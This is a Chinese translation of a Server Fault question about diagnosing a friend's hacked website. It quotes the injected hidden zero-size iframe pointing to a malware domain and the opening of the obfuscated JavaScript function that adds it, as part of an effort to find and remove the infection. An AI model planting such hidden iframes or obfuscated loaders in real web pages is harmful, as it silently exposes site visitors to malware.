如何測試網站是否感染了惡意軟體？

我的一些朋友有一個網站 (www.kennelsoffie.dk)，我會在遇到任何問題時幫助他們。然而這一次，我想不通。當我使用 Google Chrome 訪問該站點時，我看到一個警告頁面，聲稱我嘗試訪問的頁麵包含來自 stopsse.info 的元素。

我不知道任何 PHP，所以我只是下載了完整的網站，包括數據庫的備份（即 .sql 文件）。然後，我在所有文件中搜尋了stopssse，但沒有找到任何東西。

我還使用 siteadvisor.com 測試了該網站，它說“我們測試了這個網站，沒有發現任何重大問題”。

PHP 可以隱藏對惡意軟體站點的引用，因此我無法通過簡單的搜尋找到它嗎？如果是這樣，你怎麼能找到它？

我在生成的源中找到了這個

<iframe height="0" width="0" src="http://stopssse.info/l.php?thx" style="display: none; visibility: hidden;">

它就在body標籤的正下方，不在實際的頁面原始碼中，它是由混淆的javascript添加的

編輯：如果您查看http://www.kennelsoffie.dk/includes/jscript.js的底部，您會看到一個看起來非常奇怪的 javascript 函式。這就是我告訴你的混淆的 javascript 函式。它開始於

function lIIlOlIllI1000llII10l0OIIIlIOlIOI1O010l0(O00I10I0l00I0IOIO1Ol10O0Ol1Il1lI10OI00Il){var

最好的辦法是找到並刪除它。

引用自：https://serverfault.com/questions/61104